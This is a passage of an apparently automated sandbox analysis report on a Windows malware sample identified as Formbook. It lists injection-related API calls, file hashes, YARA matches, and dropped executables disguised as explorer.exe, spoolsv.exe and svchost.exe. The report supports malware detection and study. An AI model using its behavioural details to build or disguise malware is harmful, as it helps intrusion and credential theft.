Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A9B NtWriteVirtualMemory,	1_2_02283A9B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283AE7 NtWriteVirtualMemory,	1_2_02283AE7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A321 NtResumeThread,	1_2_0228A321
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283F07 NtWriteVirtualMemory,	1_2_02283F07
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228376D NtSetInformationThread,	1_2_0228376D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289F63 NtResumeThread,	1_2_02289F63
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A363 NtResumeThread,	1_2_0228A363
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280B46 NtSetInformationThread,	1_2_02280B46
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280B53 NtSetInformationThread,	1_2_02280B53
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283B57 NtWriteVirtualMemory,	1_2_02283B57
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289FAF NtResumeThread,	1_2_02289FAF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283B88 NtWriteVirtualMemory,	1_2_02283B88
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283F88 NtWriteVirtualMemory,	1_2_02283F88
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289FE8 NtResumeThread,	1_2_02289FE8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283BE9 NtWriteVirtualMemory,	1_2_02283BE9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280BEB NtSetInformationThread,	1_2_02280BEB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283FC8 NtWriteVirtualMemory,	1_2_02283FC8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A3D3 NtResumeThread,	1_2_0228A3D3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A020 NtResumeThread,	1_2_0228A020
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228404F NtWriteVirtualMemory,	1_2_0228404F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283C4F NtWriteVirtualMemory,	1_2_02283C4F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280C41 NtSetInformationThread,	1_2_02280C41
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A055 NtResumeThread,	1_2_0228A055
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A0A4 NtResumeThread,	1_2_0228A0A4
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283C94 NtWriteVirtualMemory,	1_2_02283C94
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283CD3 NtWriteVirtualMemory,	1_2_02283CD3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283911 NtWriteVirtualMemory,	1_2_02283911
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A113 NtResumeThread,	1_2_0228A113
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283166 NtWriteVirtualMemory,LoadLibraryA,	1_2_02283166
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A14B NtResumeThread,	1_2_0228A14B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283D4D NtWriteVirtualMemory,	1_2_02283D4D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228395B NtWriteVirtualMemory,	1_2_0228395B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A189 NtResumeThread,	1_2_0228A189
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283DEF NtWriteVirtualMemory,	1_2_02283DEF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A1F4 NtResumeThread,	1_2_0228A1F4
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022839C3 NtWriteVirtualMemory,	1_2_022839C3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A1C3 NtResumeThread,	1_2_0228A1C3
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DF00 NtReadVirtualMemory,	4_2_0375DF00
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DE10 NtReadFile,	4_2_0375DE10
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD60 NtCreateFile,	4_2_0375DD60
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DE0A NtReadFile,	4_2_0375DE0A
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD62 NtCreateFile,	4_2_0375DD62
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD1C NtCreateFile,	4_2_0375DD1C
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DDB2 NtReadFile,	4_2_0375DDB2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,	29_2_1E3E9A20
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,	29_2_1E3E9A00
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	29_2_1E3E9660
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,	29_2_1E3E9A50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	29_2_1E3E96E0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,	29_2_1E3E9710
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA3B0 NtGetContextThread,LdrInitializeThunk,	29_2_1E3EA3B0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,	29_2_1E3E97A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,	29_2_1E3E9780
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,	29_2_1E3E9860
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,	29_2_1E3E9840
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EB040 NtSuspendThread,LdrInitializeThunk,	29_2_1E3EB040
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,	29_2_1E3E98F0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EAD30 NtSetContextThread,LdrInitializeThunk,	29_2_1E3EAD30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	29_2_1E3E9910
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9950 NtQueueApcThread,LdrInitializeThunk,	29_2_1E3E9950
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9540 NtReadFile,LdrInitializeThunk,	29_2_1E3E9540
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,	29_2_1E3E99A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E95D0 NtClose,LdrInitializeThunk,	29_2_1E3E95D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9610 NtEnumerateValueKey,	29_2_1E3E9610
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A10 NtQuerySection,	29_2_1E3E9A10
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9670 NtQueryInformationProcess,	29_2_1E3E9670
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9650 NtQueryValueKey,	29_2_1E3E9650
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A80 NtOpenDirectoryObject,	29_2_1E3E9A80
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E96D0 NtCreateKey,	29_2_1E3E96D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9730 NtQueryVirtualMemory,	29_2_1E3E9730
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA710 NtOpenProcessToken,	29_2_1E3EA710
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9B00 NtSetValueKey,	29_2_1E3E9B00
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9770 NtSetInformationFile,	29_2_1E3E9770
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA770 NtOpenThread,	29_2_1E3EA770
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9760 NtOpenProcess,	29_2_1E3E9760
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9FE0 NtCreateMutant,	29_2_1E3E9FE0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9820 NtEnumerateKey,	29_2_1E3E9820
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E98A0 NtWriteVirtualMemory,	29_2_1E3E98A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9520 NtWaitForSingleObject,	29_2_1E3E9520
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9560 NtWriteFile,	29_2_1E3E9560
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E95F0 NtQueryInformationFile,	29_2_1E3E95F0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E99D0 NtCreateProcessEx,	29_2_1E3E99D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_005699F7 NtProtectVirtualMemory,	29_2_005699F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00569A29 NtProtectVirtualMemory,	29_2_00569A29
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00569EB9 NtProtectVirtualMemory,	29_2_00569EB9

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_0041F830	0_2_0041F830
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_00416130	0_2_00416130
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_00422F50	0_2_00422F50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00401A5C	1_2_00401A5C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00401AAC	1_2_00401AAC
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03761306	4_2_03761306
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03762212	4_2_03762212
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03746FB0	4_2_03746FB0
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760FA6	4_2_03760FA6
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0374DE40	4_2_0374DE40
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0374DE3B	4_2_0374DE3B
Source: C:\Windows\System\explorer.exe	Code function: 4_2_037625BA	4_2_037625BA
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03746D90	4_2_03746D90
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C6E30	29_2_1E3C6E30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472EF7	29_2_1E472EF7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4722AE	29_2_1E4722AE
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472B28	29_2_1E472B28
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DEBB0	29_2_1E3DEBB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46DBD2	29_2_1E46DBD2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E471FF1	29_2_1E471FF1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B841F	29_2_1E3B841F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461002	29_2_1E461002
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0	29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB090	29_2_1E3BB090
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4720A8	29_2_1E4720A8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E471D55	29_2_1E471D55
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A0D20	29_2_1E3A0D20
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120	29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AF900	29_2_1E3AF900
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472D07	29_2_1E472D07
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581	29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BD5E0	29_2_1E3BD5E0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\icsys.icn.exe F6B230F7A36830E443AEAF69C1826F3188C8C2247C6711D0148E12EC5A29DBB1
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\os9tzxfmtz.exe 446FFBE53145C93AC0D5F2201A7602846D272FD772936583125B0BD0D331D04A

Source: os9TZxfmTZ.exe, 00000000.00000002.252397999.000000000042E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe, 00000000.00000003.252174241.00000000007A4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe	Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe	Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe

Source: C:\Windows\System\explorer.exe	Section loaded: tokenbinding.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: os9TZxfmTZ.exe, 00000000.00000002.252392951.000000000042C000.00000004.00020000.sdmp, icsys.icn.exe, 00000002.00000002.268744646.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000005.00000002.269404298.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000008.00000002.267615797.000000000042C000.00000004.00020000.sdmp, explorer.exe, 00000026.00000002.289684739.000000000042C000.00000004.00020000.sdmp	Binary or memory string: f`P@*\AD:\Code\Explorer\Explorer.vbp
Source: os9TZxfmTZ.exe	Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: explorer.exe, 00000004.00000002.366780005.000000000042C000.00000004.00020000.sdmp	Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe
Source: unknown	Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\System\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: explorer.exe.2.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x382ba
Source: stsys.exe.6.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3988e
Source: os9TZxfmTZ.exe	Static PE information: real checksum: 0x3b1c8 should be: 0x67a0c
Source: icsys.icn.exe.0.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x41d85
Source: spoolsv.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x363c4
Source: svchost.exe.5.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x432a9
Source: mrsys.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3b78a

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00405A3F push ecx; ret	1_2_00405A3D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0040715D push es; ret	1_2_004071DB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059E4 push ecx; ret	1_2_004059E5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059FB push ecx; ret	1_2_00405A3D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059A0 push ecx; ret	1_2_004059D5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004075BC push es; retf	1_2_004075CB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280076 push esp; iretd	1_2_02280077
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022800E3 push esp; iretd	1_2_022800E4
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375F124 push 423E369Ah; iretd	4_2_0375F12B
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375B867 push edx; retf	4_2_0375B869
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03761F6E push ds; ret	4_2_03761F77
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F6C push eax; ret	4_2_03760F72
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F02 push eax; ret	4_2_03760F08
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F0B push eax; ret	4_2_03760F72
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03754FA6 push ebx; ret	4_2_03754FA7
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375A625 push ds; retf	4_2_0375A626
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760EB5 push eax; ret	4_2_03760F08
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3FD0D1 push ecx; ret	29_2_1E3FD0E4

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file

Source: C:\Windows\System\svchost.exe	Executable created and started: c:\windows\system\spoolsv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Executable created and started: c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Executable created and started: c:\windows\system\svchost.exe	Jump to behavior

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
